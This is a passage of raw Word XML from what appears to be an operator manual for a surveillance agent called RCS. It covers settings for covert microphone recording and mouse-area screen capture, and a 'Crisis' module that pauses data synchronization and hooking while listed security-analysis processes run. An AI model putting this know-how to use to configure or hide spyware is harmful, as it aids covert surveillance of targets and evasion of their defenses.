                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00A52C9B" w:rsidRDefault="00F43991" w:rsidP="00F4399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(Mic)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1188" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:96.3pt;z-index:251777024;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId184" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1188" DrawAspect="Content" ObjectID="_1446455368" r:id="rId185"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00583B07" w:rsidRDefault="00583B07" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Silence between voices</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the maximum number of seconds of silence admitted in the recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Voice recognition</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a value to identify human voice and exclude any background noise from the recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Autosense</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] If enabled, the agent attempts to change audio mixer settings (microphone on/off, line selection and volume) to optimize audio recording quality, avoiding low volumes</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583B07" w:rsidRPr="00F43991" w:rsidRDefault="00583B07" w:rsidP="005611FD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>or interruptions in the recording.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00565ADF" w:rsidRDefault="00565ADF" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DE62FA" w:rsidRDefault="00DE62FA" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>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1"/>
        <w:gridCol w:w="288"/>
        <w:gridCol w:w="6069"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE62FA" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3271" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C93347" w:rsidRDefault="003A4380" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1145" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:154.05pt;height:133.1pt;z-index:251767808;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId186" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1145" DrawAspect="Content" ObjectID="_1446455369" r:id="rId187"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRDefault="0010013A" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.30</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00A52C9B" w:rsidRDefault="00C93347" w:rsidP="00C93347">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(Mouse)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="288" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE62FA" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6069" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="008E64B2" w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Width</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="006B4C1C" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the width of the captured image.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="008E64B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="008E64B2" w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Height</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="006B4C1C" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the height of the captured image.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE62FA" w:rsidRPr="00C93347" w:rsidRDefault="00DE62FA" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DE62FA" w:rsidRDefault="00DE62FA" w:rsidP="00DE62FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E64B2" w:rsidRDefault="008E64B2" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabel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8"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E64B2" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00087607" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.31</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># Target #</w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="00087607">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidR="00C93347" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> #</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Module (Crisis)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1147" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:470.5pt;height:181.65pt;z-index:251769856;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId188" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1147" DrawAspect="Content" ObjectID="_1446455370" r:id="rId189"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347" w:rsidP="00C93347"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9628"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E64B2" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00C93347" w:rsidRDefault="008E64B2" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="003B3135" w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Inhibits Network</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="003B3135" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>inhibits synchronization when potentially dangerous processes are running.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008072BC" w:rsidRPr="00C93347" w:rsidRDefault="008072BC" w:rsidP="008072BC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008072BC" w:rsidRPr="00C93347" w:rsidRDefault="008072BC" w:rsidP="008072BC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Inhibitors</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="001A40A0" w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the list of processes that, if running, will prevent synchronization.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00C93347" w:rsidRDefault="00C93347" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008E64B2" w:rsidRPr="00C93347" w:rsidRDefault="008072BC" w:rsidP="00C93347">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ihibits Hooking</w:t>
            </w:r>
            <w:r w:rsidRPr="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
